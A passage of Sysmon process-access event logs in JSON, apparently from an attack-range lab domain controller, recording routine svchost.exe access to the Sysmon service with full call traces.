Files\\SplunkUniversalForwarder\\bin\\splunk-netmon.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3084,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3085,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3086,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3087,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3088,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+92e1|c:\\windows\\system32\\lsm.dll+91d0|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3089,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3090,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:51:26","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:51:24","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":3091,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:51:24.503\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:51:24.503","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 